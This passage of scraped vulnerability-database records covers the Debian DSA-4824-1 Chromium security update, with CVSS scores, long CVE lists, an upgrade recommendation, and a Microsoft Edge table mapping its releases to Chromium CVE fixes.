"CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-01-01T18:49:56", "type": "debian", "title": "[SECURITY] [DSA 4824-1] chromium security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-8075", "CVE-2020-15959", "CVE-2020-15960", "CVE-2020-15961", "CVE-2020-15962", "CVE-2020-15963", "CVE-2020-15964", "CVE-2020-15965", "CVE-2020-15966", "CVE-2020-15967", "CVE-2020-15968", "CVE-2020-15969", "CVE-2020-15970", "CVE-2020-15971", "CVE-2020-15972", "CVE-2020-15973", "CVE-2020-15974", "CVE-2020-15975", "CVE-2020-15976", "CVE-2020-15977", "CVE-2020-15978", "CVE-2020-15979", "CVE-2020-15980", "CVE-2020-15981", "CVE-2020-15982", "CVE-2020-15983", "CVE-2020-15984", "CVE-2020-15985", "CVE-2020-15986", "CVE-2020-15987", "CVE-2020-15988", "CVE-2020-15989", "CVE-2020-15990", "CVE-2020-15991", "CVE-2020-15992", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16011", "CVE-2020-16012", "CVE-2020-16013", "CVE-2020-16014", "CVE-2020-16015", "CVE-2020-16016", "CVE-2020-16017", "CVE-2020-16018", "CVE-2020-16019", "CVE-2020-16020", "CVE-2020-16021", "CVE-2020-16022", "CVE-2020-16023", "CVE-2020-16024", "CVE-2020-16025", "CVE-2020-16026", "CVE-2020-16027", "CVE-2020-16028", "CVE-2020-16029", "CVE-2020-16030", "CVE-2020-16031", "CVE-2020-16032", "CVE-2020-16033", "CVE-2020-16034", "CVE-2020-16035", "CVE-2020-16036", "CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042", "CVE-2020-6510", "CVE-2020-6511", "CVE-2020-6512", "CVE-2020-6513", "CVE-2020-6514", "CVE-2020-6515", "CVE-2020-6516", "CVE-2020-6517", "CVE-2020-6518", "CVE-2020-6519", "CVE-2020-6520", "CVE-2020-6521", "CVE-2020-6522", "CVE-2020-6523", "CVE-2020-6524", "CVE-2020-6525", "CVE-2020-6526", "CVE-2020-6527", "CVE-2020-6528", "CVE-2020-6529", "CVE-2020-6530", "CVE-2020-6531", "CVE-2020-6532", "CVE-2020-6533", "CVE-2020-6534", "CVE-2020-6535", "CVE-2020-6536", "CVE-2020-6537", "CVE-2020-6538", "CVE-2020-6539", "CVE-2020-6540", "CVE-2020-6541", "CVE-2020-6542", "CVE-2020-6543", "CVE-2020-6544", "CVE-2020-6545", "CVE-2020-6546", "CVE-2020-6547", "CVE-2020-6548", "CVE-2020-6549", "CVE-2020-6550", "CVE-2020-6551", "CVE-2020-6552", "CVE-2020-6553", "CVE-2020-6554", "CVE-2020-6555", "CVE-2020-6556", "CVE-2020-6557", "CVE-2020-6558", "CVE-2020-6559", "CVE-2020-6560", "CVE-2020-6561", "CVE-2020-6562", "CVE-2020-6563", "CVE-2020-6564", "CVE-2020-6565", "CVE-2020-6566", "CVE-2020-6567", "CVE-2020-6568", "CVE-2020-6569", "CVE-2020-6570", "CVE-2020-6571", "CVE-2020-6573", "CVE-2020-6574", "CVE-2020-6575", "CVE-2020-6576"], "modified": "2021-01-01T18:49:56", "id": "DEBIAN:DSA-4824-1:11EBB", "href": "https://lists.debian.org/debian-security-announce/2021/msg00002.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-08-10T07:19:41", "description": "\nMultiple security issues were discovered in the Chromium web browser, which\ncould result in the execution of arbitrary code, denial of service\nor information disclosure.\n\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 87.0.4280.88-0.4~deb10u1.\n\n\nWe recommend that you upgrade your chromium packages.\n\n\nFor the detailed security status of chromium please refer to\nits security tracker page at:\n[\\\nhttps://security-tracker.debian.org/tracker/chromium](https://security-tracker.debian.org/tracker/chromium)\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-01-01T00:00:00", "type": "osv", "title": "chromium - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16024", "CVE-2020-6548", "CVE-2020-6518", "CVE-2020-16026", "CVE-2020-15965", "CVE-2020-16012", "CVE-2020-16000", "CVE-2020-6569", "CVE-2020-16011", "CVE-2020-15979", "CVE-2020-6564", "CVE-2020-15962", "CVE-2020-15969", "CVE-2020-6570", "CVE-2020-6533", "CVE-2020-6565", "CVE-2020-16032", "CVE-2020-6561", "CVE-2020-6540", "CVE-2020-15984", "CVE-2020-6559", "CVE-2020-6545", "CVE-2020-6554", "CVE-2020-6566", "CVE-2020-6528", "CVE-2020-6563", "CVE-2020-16031", "CVE-2020-15974", "CVE-2020-16030", "CVE-2020-16039", "CVE-2020-15960", "CVE-2020-16035", "CVE-2020-6547", "CVE-2020-6529", "CVE-2020-15999", "CVE-2020-6537", "CVE-2020-6560", "CVE-2020-16027", "CVE-2020-16009", "CVE-2020-6511", "CVE-2020-6568", "CVE-2020-15982", "CVE-2020-6542", "CVE-2020-15968", "CVE-2020-16002", "CVE-2020-15975", "CVE-2020-15985", "CVE-2020-6538", "CVE-2020-15976", "CVE-2020-6550", "CVE-2020-16001", "CVE-2020-6534", "CVE-2020-16021", "CVE-2020-16023", "CVE-2020-16042", "CVE-2020-16029", "CVE-2020-15989", "CVE-2020-6532", "CVE-2020-6521", "CVE-2020-15983", "CVE-2020-6536", "CVE-2020-15972", "CVE-2020-16005", "CVE-2020-15966", "CVE-2020-16004", "CVE-2020-6535", "CVE-2020-16008", "CVE-2020-6571", "CVE-2020-6519", "CVE-2020-16016", "CVE-2020-16041", "CVE-2020-6530", "CVE-2020-6520", "CVE-2020-6522", "CVE-2020-15963", "CVE-2020-16040", "CVE-2020-16034", "CVE-2020-15964", "CVE-2020-15986", "CVE-2020-6555", "CVE-2020-15973", "CVE-2020-16022", "CVE-2020-6573", "CVE-2020-15987", "CVE-2020-15971", "CVE-2020-6512", "CVE-2020-15991", "CVE-2020-6567", "CVE-2020-16033", "CVE-2020-6514", "CVE-2020-16019", "CVE-2020-6576", "CVE-2020-6543", "CVE-2020-16014", "CVE-2020-6539", "CVE-2020-16003", "CVE-2020-16006", "CVE-2020-16036", "CVE-2020-6515", "CVE-2020-6551", "CVE-2020-6575", "CVE-2020-15970", "CVE-2020-6552", "CVE-2020-6513", "CVE-2020-15977", "CVE-2020-16013", "CVE-2020-6557", "CVE-2020-6556", "CVE-2020-6523", "CVE-2020-16038", "CVE-2020-16018", "CVE-2020-16025", "CVE-2020-16037", "CVE-2020-6526", "CVE-2020-15990", "CVE-2020-16015", "CVE-2020-16028", "CVE-2020-6553", "CVE-2020-6549", "CVE-2020-15978", "CVE-2020-15981", "CVE-2020-6516", "CVE-2020-6525", "CVE-2020-6562", "CVE-2020-15961", "CVE-2020-6527", "CVE-2020-6541", "CVE-2020-15980", "CVE-2020-6517", "CVE-2020-16017", "CVE-2020-15988", "CVE-2020-6524", "CVE-2020-15967", "CVE-2020-6531", "CVE-2020-6510", "CVE-2020-6544", "CVE-2020-15992", "CVE-2020-16020", "CVE-2020-15959"], "modified": "2022-08-10T07:19:38", "id": "OSV:DSA-4824-1", "href": "https://osv.dev/vulnerability/DSA-4824-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-03-17T02:35:20", "description": "**Please note:** Starting 1/21/2021, we will be releasing the Chrome CVEs that are included in the new releases of Microsoft Edge (Chromium-based) directly in the Security Update Guide. Please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>) for more information.\n\nThis advisory will be updated whenever Microsoft releases a version of Microsoft Edge (Chromium-based) which incorporates publicly disclosed security updates from the Chromium project. Microsoft will document separately any vulnerabilities in Microsoft Edge (Chromium-based), that are not in Chromium, under a Microsoft-assigned CVE number (see, for example: [CVE-2020-1341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/cve-2020-1341>)).\n\n**History of Microsoft Edge (Chromium-based) Security Updates**\n\nMicrosoft Edge Version | Date Released | Based on Chromium Version | Highest Severity Fix in Release | CVEs \n---|---|---|---|--- \n87.0.664.75 | 1/7/2021 | 87.0.4280.141 | High | [CVE-2021-21106](<https://vulners.com/cve/CVE-2021-21106>), [CVE-2021-21107](<https://vulners.com/cve/CVE-2021-21107>), [CVE-2021-21108](<https://vulners.com/cve/CVE-2021-21108>), [CVE-2021-21109](<https://vulners.com/cve/CVE-2021-21109>), [CVE-2021-21110](<https://vulners.com/cve/CVE-2021-21110>), [CVE-2021-21111](<https://vulners.com/cve/CVE-2021-21111>), [CVE-2021-21112](<https://vulners.com/cve/CVE-2021-21112>), [CVE-2021-21113](<https://vulners.com/cve/CVE-2021-21113>), [CVE-2021-21114](<https://vulners.com/cve/CVE-2021-21114>), [CVE-2021-21115](<https://vulners.com/cve/CVE-2021-21115>), [CVE-2021-21116](<https://vulners.com/cve/CVE-2021-21116>), [CVE-2020-16043](<https://vulners.com/cve/CVE-2020-16043>), [CVE-2020-15995](<https://vulners.com/cve/CVE-2020-15995>) \n87.0.664.57 | 12/7/2020 | 87.0.4280.88 | High | [CVE-2020-16037](<https://vulners.com/cve/CVE-2020-16037>), [CVE-2020-16038](<https://vulners.com/cve/CVE-2020-16038>), [CVE-2020-16039](<https://vulners.com/cve/CVE-2020-16039>), [CVE-2020-16040](<https://vulners.com/cve/CVE-2020-16040>), [CVE-2020-16041](<https://vulners.com/cve/CVE-2020-16041>), [CVE-2020-16042](<https://vulners.com/cve/CVE-2020-16042>) \n87.0.664.41 | 11/19/2020 | 87.0.4280.66 for Windows and Linux, 87.0.4280.67 for Mac | High | [CVE-2019-8075](<https://vulners.com/cve/CVE-2019-8075>), [CVE-2020-16012](<https://vulners.com/cve/CVE-2020-16012>), [CVE-2020-16014](<https://vulners.com/cve/CVE-2020-16014>), [CVE-2020-16015](<https://vulners.com/cve/CVE-2020-16015>), [CVE-2020-16018](<https://vulners.com/cve/CVE-2020-16018>), [CVE-2020-16022](<https://vulners.com/cve/CVE-2020-16022>), [CVE-2020-16023](<https://vulners.com/cve/CVE-2020-16023>), [CVE-2020-16024](<https://vulners.com/cve/CVE-2020-16024>), [CVE-2020-16025](<https://vulners.com/cve/CVE-2020-16025>), [CVE-2020-16026](<https://vulners.com/cve/CVE-2020-16026>), [CVE-2020-16027](<https://vulners.com/cve/CVE-2020-16027>), [CVE-2020-16028](<https://cve.mitre.org/ci-bin/cvename.cgi?name=CVE-2020-16028>), [CVE-2020-16029](<https://vulners.com/cve/CVE-2020-16029>), [CVE-2020-16030](<https://vulners.com/cve/CVE-2020-16030>), [CVE-2020-16031](<https://vulners.com/cve/CVE-2020-16031>), [CVE-2020-16032](<https://vulners.com/cve/CVE-2020-16032>), [CVE-2020-16033](<https://vulners.com/cve/CVE-2020-16033>), [CVE-2020-16034](<https://vulners.com/cve/CVE-2020-16034>), [CVE-2020-16036](<https://vulners.com/cve/CVE-2020-16036>) \n86.0.622.69 | 11/13/2020 | 86.0.4240.198 | High | [**CVE-2020-16013**](<https://vulners.com/cve/CVE-2020-16013>) *, [**CVE-2020-16017**](<https://vulners.com/cve/CVE-2020-16017>) * \n86.0.622.68 | 11/11/2020 | 86.0.4240.193 | High | [CVE-2020-16016](<https://vulners.com/cve/CVE-2020-16016>) \n86.0.622.63 | 11/4/2020 | 86.0.4240.183 | High | [CVE-2020-16004](<https://vulners.com/cve/CVE-2020-16004>), [CVE-2020-16005](<https://vulners.com/cve/CVE-2020-16005>), [CVE-2020-16006](<https://vulners.com/cve/CVE-2020-16006>), [CVE-2020-16007](<https://vulners.com/cve/CVE-2020-16007>), [CVE-2020-16008](<https://vulners.com/cve/CVE-2020-16008>), [**CVE-2020-16009**](<https://vulners.com/cve/CVE-2020-16009>) *, [CVE-2020-16011](<https://vulners.com/cve/CVE-2020-16011>) \n86.0.622.51 | 10/22/2020 | 86.0.4240.111 | High | [**CVE-2020-15999**](<https://vulners.com/cve/CVE-2020-15999>) *, [CVE-2020-16000](<https://vulners.com/cve/CVE-2020-16000>), [CVE-2020-16001](<https://vulners.com/cve/CVE-2020-16001>), [CVE-2020-16002](<https://vulners.com/cve/CVE-2020-16002>), [CVE-2020-16003](<https://vulners.com/cve/CVE-2020-16003>) \n86.0.622.38 | 10/8/2020 | 86.0.4240.75 | High | [CVE-2020-6557](<https://vulners.com/cve/CVE-2020-6557>), [CVE-2020-15968](<https://vulners.com/cve/CVE-2020-15968>), [CVE-2020-15969](<https://vulners.com/cve/CVE-2020-15969>), [CVE-2020-15971](<https://vulners.com/cve/CVE-2020-15971>), [CVE-2020-15972](<https://vulners.com/cve/CVE-2020-15972>), [CVE-2020-15973](<https://vulners.com/cve/CVE-2020-15973>), [CVE-2020-15974](<https://vulners.com/cve/CVE-2020-15974>), [CVE-2020-15975](<https://vulners.com/cve/CVE-2020-15975>), [CVE-2020-15977](<https://vulners.com/cve/CVE-2020-15977>), [CVE-2020-15979](<https://vulners.com/cve/CVE-2020-15979>), [CVE-2020-15981](<https://vulners.com/cve/CVE-2020-15981>), [CVE-2020-15982](<https://vulners.com/cve/CVE-2020-15982>), [CVE-2020-15985](<https://cve.mitre.org/cgi-bin/cvenamecgi?name=CVE-2020-15985>), [CVE-2020-15987](<https://vulners.com/cve/CVE-2020-15987>), [CVE-2020-15988](<https://vulners.com/cve/CVE-2020-15988>), [CVE-2020-15989](<https://vulners.com/cve/CVE-2020-15989>), [CVE-2020-15990](<https://vulners.com/cve/CVE-2020-15990>), [CVE-2020-15991](<https://vulners.com/cve/CVE-2020-15991>), [CVE-2020-15992](<https://vulners.com/cve/CVE-2020-15992>) \n85.0.564.63 | 9/23/2020 | 85.0.4183.121 | High | [CVE-2020-15960](<https://vulners.com/cve/CVE-2020-15960>), [CVE-2020-15961](<https://vulners.com/cve/CVE-2020-15961>), [CVE-2020-15962](<https://vulners.com/cve/CVE-2020-15962>), [CVE-2020-15963](<https://vulners.com/cve/CVE-2020-15963>), [CVE-2020-15964](<https://vulners.com/cve/CVE-2020-15964>), [CVE-2020-15965](<https://vulners.com/cve/CVE-2020-15965>), [CVE-2020-15966](<https://vulners.com/cve/CVE-2020-15966>) \n85.0.564.51 | 9/9/2020 | 85.0.4183.102 | High | [CVE-2020-6574](<https://vulners.com/cve/CVE-2020-6574>), [CVE-2020-6575](<https://vulners.com/cve/CVE-2020-6575>), [CVE-2020-6576](<https://vulners.com/cve/CVE-2020-6576>), [CVE-2020-15959](<https://vulners.com/cve/CVE-2020-15959>) \n85.0.564.41 | 8/27/2020 | 85.0.4183.83 | High | [CVE-2020-6558](<https://vulners.com/cve/CVE-2020-6558>), [CVE-2020-6559](<https://vulners.com/cve/CVE-2020-6559>), [CVE-2020-6560](<https://vulners.com/cve/CVE-2020-6560>), [CVE-2020-6561](<https://vulners.com/cve/CVE-2020-6561>), [CVE-2020-6562](<https://vulners.com/cve/CVE-2020-6562>), [CVE-2020-6563](<https://vulners.com/cve/CVE-2020-6563>), [CVE-2020-6564](<https://vulners.com/cve/CVE-2020-6564>), [CVE-2020-6566](<https://vulners.com/cve/CVE-2020-6566>), [CVE-2020-6567](<https://vulners.com/cve/CVE-2020-6567>), [CVE-2020-6568](<https://vulners.com/cve/CVE-2020-6568>), [CVE-2020-6569](<https://vulners.com/cve/CVE-2020-6569>), [CVE-2020-6570](<https://vulners.com/cve/CVE-2020-6570>), [CVE-2020-6571](<https://vulners.com/cve/CVE-2020-6571>) \n84.0.522.63 | 8/20/2020 | 84.0.4147.135 | High | [CVE-2020-6556](<https://vulners.com/cve/CVE-2020-6556>) \n84.0.522.59 | 8/11/2020 | 84.0.4147.125 | High | [CVE-2020-6542](<https://vulners.com/cve/CVE-2020-6542>), [CVE-2020-6543](<https://vulners.com/cve/CVE-2020-6543>), [CVE-2020-6544](<https://vulners.com/cve/CVE-2020-6544>), [CVE-2020-6545](<https://vulners.com/cve/CVE-2020-6545>), [CVE-2020-6546](<https://vulners.com/cve/CVE-2020-6546>), [CVE-2020-6547](<https://vulners.com/cve/CVE-2020-6547>), [CVE-2020-6548](<https://vulners.com/cve/CVE-2020-6548>), [CVE-2020-6549](<https://vulners.com/cve/CVE-2020-6549>), [CVE-2020-6550](<https://vulners.com/cve/CVE-2020-6550>), [CVE-2020-6551](<https://vulners.com/cve/CVE-2020-6551>), [CVE-2020-6552](<https://vulners.com/cve/CVE-2020-6552>), [CVE-2020-6553](<https://vulners.com/cve/CVE-2020-6553>), [CVE-2020-6554](<https://vulners.com/cve/CVE-2020-6554>), [CVE-2020-6555](<https://vulners.com/cve/CVE-2020-6555>) \n84.0.522.49 | 7/30/2020 | 84.0.4147.105 | High | [CVE-2020-6532](<https://vulners.com/cve/CVE-2020-6532>), [CVE-2020-6537](<https://vulners.com/cve/CVE-2020-6537>), [CVE-2020-6538](<https://vulners.com/cve/CVE-2020-6538>), [CVE-2020-6539](<https://vulners.com/cve/CVE-2020-6539>), [CVE-2020-6540](<https://vulners.com/cve/CVE-2020-6540>), [CVE-2020-6541](<https://vulners.com/cve/CVE-2020-6541>) \n84.0.522.40 | 7/16/2020 | 84.0.4147.89 | Critical | [CVE-2020-6510](<https://vulners.com/cve/CVE-2020-6510>), [CVE-2020-6511](<https://vulners.com/cve/CVE-2020-6511>), [CVE-2020-6512](<https://vulners.com/cve/CVE-2020-6512>), [CVE-2020-6513](<https://vulners.com/cve/CVE-2020-6513>), [CVE-2020-6514](<https://vulners.com/cve/CVE-2020-6514>), [CVE-2020-6515](<https://vulners.com/cve/CVE-2020-6515>), [CVE-2020-6516](<https://vulners.com/cve/CVE-2020-6516>), [CVE-2020-6517](<https://vulners.com/cve/CVE-2020-6517>), [CVE-2020-6518](<https://vulners.com/cve/CVE-2020-6518>), [CVE-2020-6519](<https://vulners.com/cve/CVE-2020-6519>), [CVE-2020-6520](<https://vulners.com/cve/CVE-2020-6520>), [CVE-2020-6521](<https://vulners.com/cve/CVE-2020-6521>), [CVE-2020-6522](<https://vulners.com/cve/CVE-2020-6522>), [CVE-2020-6523](<https://vulners.com/cve/CVE-2020-6523>), [CVE-2020-6524](<https://vulners.com/cve/CVE-2020-6524>), [CVE-2020-6525](<https://vulners.com/cve/CVE-2020-6525>), [CVE-2020-6526](<https://vulners.com/cve/CVE-2020-6526>), [CVE-2020-6527](<https://vulners.com/cve/CVE-2020-6527>), [CVE-2020-6528](<https://vulners.com/cve/CVE-2020-6528>), [CVE-2020-6529](<https://vulners.com/cve/CVE-2020-6529>), [CVE-2020-6530](<https://vulners.com/cve/CVE-2020-6530>), [CVE-2020-6531](<https://vulners.com/cve/CVE-2020-6531>), [CVE-2020-6533](<https://vulners.com/cve/CVE-2020-6533>), [CVE-2020-6534](<https://vulners.com/cve/CVE-2020-6534>), [CVE-2020-6535](<https://vulners.com/cve/CVE-2020-6535>), [CVE-2020-6536](<https://vulners.com/cve/CVE-2020-6536>) \n83.0.478.56 | 6/24/2020 | 83.0.4103.116 | High | [CVE-2020-6509](<https://vulners.com/cve/CVE-2020-6509>) \n83.0.478.53 | 6/17/2020 | 83.0.4103.106 | High | [CVE-2020-6505](<https://vulners.com/cve/CVE-2020-6505>), [CVE-2020-6506](<https://vulners.com/cve/CVE-2020-6506>), [CVE-2020-6507](<https://vulners.com/cve/CVE-2020-6507>) \n83.0.478.45 | 6/4/2020 | 83.0.4103.97 | High | [CVE-2020-6493](<https://vulners.com/cve/CVE-2020-6493>), [CVE-2020-6494](<https://vulners.com/cve/CVE-2020-6494>), [CVE-2020-6495](<https://vulners.com/cve/CVE-2020-6495>), [CVE-2020-6496](<https://vulners.com/cve/CVE-2020-6496>) \n83.0.478.37 | 5/21/2020 | 83.0.4103.61 | High | [CVE-2020-6465](<https://vulners.com/cve/CVE-2020-6465>), [CVE-2020-6466](<https://vulners.com/cve/CVE-2020-6466>), [CVE-2020-6467](<https://vulners.com/cve/CVE-2020-6467>), [CVE-2020-6468](<https://vulners.com/cve/CVE-2020-6468>), [CVE-2020-6469](<https://vulners.com/cve/CVE-2020-6469>), [CVE-2020-6470](<https://vulners.com/cve/CVE-2020-6470>), [CVE-2020-6471](<https://vulners.com/cve/CVE-2020-6471>), [CVE-2020-6472](<https://vulners.com/cve/CVE-2020-6472>), [CVE-2020-6473](<https://vulners.com/cve/CVE-2020-6473>), [CVE-2020-6474](<https://vulners.com/cve/CVE-2020-6474>), [CVE-2020-6475](<https://vulners.com/cve/CVE-2020-6475>), [CVE-2020-6476](<https://vulners.com/cve/CVE-2020-6476>), [CVE-2020-6478](<https://vulners.com/cve/CVE-2020-6478>), [CVE-2020-6479](<https://vulners.com/cve/CVE-2020-6479>), [CVE-2020-6480](<https://vulners.com/cve/CVE-2020-6480>), [CVE-2020-6481](<https://vulners.com/cve/CVE-2020-6481>), [CVE-2020-6482](<https://vulners.com/cve/CVE-2020-6482>), [CVE-2020-6483](<https://vulners.com/cve/CVE-2020-6483>), [CVE-2020-6484](<https://vulners.com/cve/CVE-2020-6484>), [CVE-2020-6486](<https://vulners.com/cve/CVE-2020-6486>), [CVE-2020-6487](<https://vulners.com/cve/CVE-2020-6487>), [CVE-2020-6488](<https://vulners.com/cve/CVE-2020-6488>), [CVE-2020-6489](<https://vulners.com/cve/CVE-2020-6489>), [CVE-2020-6490](<https://vulners.com/cve/CVE-2020-640>) \n81.0.416.72 | 5/7/2020 | 81.0.4044.138 | High | [CVE-2020-6831](<https://vulners.com/cve/CVE-2020-6831>), [CVE-2020-6464](<https://vulners.com/cve/CVE-2020-6464>) \n81.0.416.68 | 4/29/2020 | 81.0.4044.129 | High | [CVE-2020-6461](<https://vulners.com/cve/CVE-2020-6461>), [CVE-2020-6462](<https://vulners.com/cve/CVE-2020-6462>) \n81.0.416.64 | 4/23/2020 | 81.0.4044.122 | High | [CVE-2020-6458](<https://vulners.com/cve/CVE-2020-6458>), [CVE-2020-6459](<https://vulners.com/cve/CVE-2020-6459>), [CVE-2020-6460](<https://vulners.com/cve/CVE-2020-6460>) \n81.0.416.58 | 4/17/2020 | 81.0.4044.113 | Critical | [CVE-2020-6457](<https://vulners.com/cve/CVE-2020-6457>) \n81.0.416.53 | 4/13/2020 | 81.0.4044.92 | High | [CVE-2020-6454](<https://vulners.com/cve/CVE-2020-6454>), [CVE-2020-6423](<https://vulners.com/cve/CVE-2020-6423>), [CVE-2020-6455](<https://vulners.com/cve/CVE-2020-6455>), [CVE-2020-6430](<https://vulners.com/cve/CVE-2020-6430>), [CVE-2020-6456](<https://vulners.com/cve/CVE-2020-6456>), [CVE-2020-6431](<https://vulners.com/cve/CVE-2020-6431>), [CVE-2020-6432](<https://vulners.com/cve/CVE-2020-6432>), [CVE-2020-6433](<https://vulners.com/cve/CVE-2020-6433>), [CVE-2020-6434](<https://vulners.com/cve/CVE-2020-6434>), [CVE-2020-6435](<https://vulners.com/cve/CVE-2020-6435>), [CVE-2020-6436](<https://vulners.com/cve/CVE-2020-6436>), [CVE-2020-6437](<https://vulners.com/cve/CVE-2020-6437>), [CVE-2020-6438](<https://vulners.com/cve/CVE-2020-6438>), [CVE-2020-6439](<https://vulners.com/cve/CVE-2020-6439>), [CVE-2020-6440](<https://vulners.com/cve/CVE-2020-6440>), [CVE-2020-6441](<https://vulners.com/cve/CVE-2020-6441>), [CVE-2020-6442](<https://vulners.com/cve/CVE-2020-6442>), [CVE-2020-6443](<https://vulners.com/cve/CVE-2020-6443>), [CVE-2020-6444](<https://vulners.com/cve/CVE-2020-6444>), [CVE-2020-6445](<https://vulners.com/cve/CVE-2020-6445>), [CVE-2020-6446](<https://vulners.com/cve/CVE-2020-6446>), [CVE-2020-6447](<https://vulners.com/cve/CVE-2020-6447>), [CVE-2020-6448](<https://vulners.com/cve/CVE-2020-6448>) \n80.0.361.109 | 4/1/2020 | 80.0.3987.162 | High | [CVE-2020-6450](<https://vulners.com/cve/CVE-2020-6450>), [CVE-2020-6451](<https://vulners.com/cve/CVE-2020-6451>), [CVE-2020-6452](<https://vulners.com/cve/CVE-2020-6452>) \n80.0.361.69 | 3/19/2020 | 80.0.3987.149 | High | [CVE-2020-6422](<https://vulners.com/cve/CVE-2020-6422>), [CVE-2020-6424](<https://vulners.com/cve/CVE-2020-6424>), [CVE-2020-6425](<https://vulners.com/cve/CVE-2020-6425>), [CVE-2020-6426](<https://vulners.com/cve/CVE-2020-6426>), [CVE-2020-6427](<https://vulners.com/cve/CVE-2020-6427>), [CVE-2020-6428](<https://vulners.com/cve/CVE-2020-6428>), [CVE-2020-6429](<https://vulners.com/cve/CVE-2020-6429>), [CVE-2019-20503](<https://vulners.com/cve/CVE-2019-20503>), [CVE-2020-6449](<https://vulners.com/cve/CVE-2020-6449>) \n80.0.361.66 | 3/4/2020 | 80.0.3987.132 | High | [CVE-2020-6420](<https://vulners.com/cve/CVE-2020-6420>) \n80.0.361.62 | 2/25/2020 | 80.0.3987.122 | High | [CVE-2020-6407](<https://vulners.com/cve/CVE-2020-6407>), [**CVE-2020-6418**](<https://vulners.com/cve/CVE-2020-6418>) * \n80.0.361.57 | 2/20/2020 | 80.0.3987.116 | High | [CVE-2020-6383](<https://vulners.com/cve/CVE-2020-6383>), [CVE-2020-6384](<https://vulners.com/cve/CVE-2020-6384>), [CVE-2020-6386](<https://vulners.com/cve/CVE-2020-6386>) \n80.0.361.48 | 2/7/2020 | 80.0.3987.87 | High | [CVE-2020-6381](<https://vulners.com/cve/CVE-2020-6381>), [CVE-2020-6382](<https://vulners.com/cve/CVE-2020-6382>), [CVE-2019-18197](<https://vulners.com/cve/CVE-2019-18197>), [CVE-2019-19926](<https://vulners.com/cve/CVE-2019-19926>), [CVE-2020-6385](<https://vulners.com/cve/CVE-2020-6385>), [CVE-2019-19880](<https://vulners.com/cve/CVE-2019-19880>), [CVE-2019-19925](<https://vulners.com/cve/CVE-2019-19925>), [CVE-2020-6387](<https://vulners.com/cve/CVE-2020-6387>), [CVE-2020-6388](<https://vulners.com/cve/CVE-2020-6388>), [CVE-2020-6389](<https://vulners.com/cve/CVE-2020-6389>), [CVE-2020-6390](<https://vulners.com/cve/CVE-2020-6390>), [CVE-2020-6391](<https://vulners.com/cve/CVE-2020-6391>), [CVE-2020-6392](<https://vulners.com/cve/CVE-202-6392>), [CVE-2020-6393](<https://vulners.com/cve/CVE-2020-6393>), [CVE-2020-6394](<https://vulners.com/cve/CVE-2020-6394>), [CVE-2020-6395](<https://vulners.com/cve/CVE-2020-6395>), [CVE-2020-6396](<https://vulners.com/cve/CVE-2020-6396>), [CVE-2020-6397](<https://vulners.com/cve/CVE-2020-6397>), [CVE-2020-6398](<https://vulners.com/cve/CVE-2020-6398>), [CVE-2020-6399](<https://vulners.com/cve/CVE-2020-6399>), [CVE-2020-6400](<https://vulners.com/cve/CVE-2020-6400>), [CVE-2020-6401](<https://vulners.com/cve/CVE-2020-6401>), [CVE-2020-6402](<https://vulners.com/cve/CVE-2020-6402>), [CVE-2020-6404](<https://vulners.com/cve/CVE-2020-6404>), [CVE-2020-6405](<https://vulners.com/cve/CVE-220-6405>), [CVE-2020-6406](<https://vulners.com/cve/CVE-2020-6406>), [CVE-2019-19923](<https://vulners.com/cve/CVE-2019-19923>), [CVE-2020-6408](<https://vulners.com/cve/CVE-2020-6408>), [CVE-2020-6409](<https://vulners.com/cve/CVE-2020-6409>), [CVE-2020-6410](<https://vulners.com/cve/CVE-2020-6410>), [CVE-2020-6411](<https://vulners.com/cve/CVE-2020-6411>), [CVE-2020-6412](<https://vulners.com/cve/CVE-2020-6412>), [CVE-2020-6413](<https://vulners.com/cve/CVE-2020-6413>), [CVE-2020-6414](<https://vulners.com/cve/CVE-2020-6414>), [CVE-2020-6415](<https://vulners.com/cve/CVE-2020-6415>), 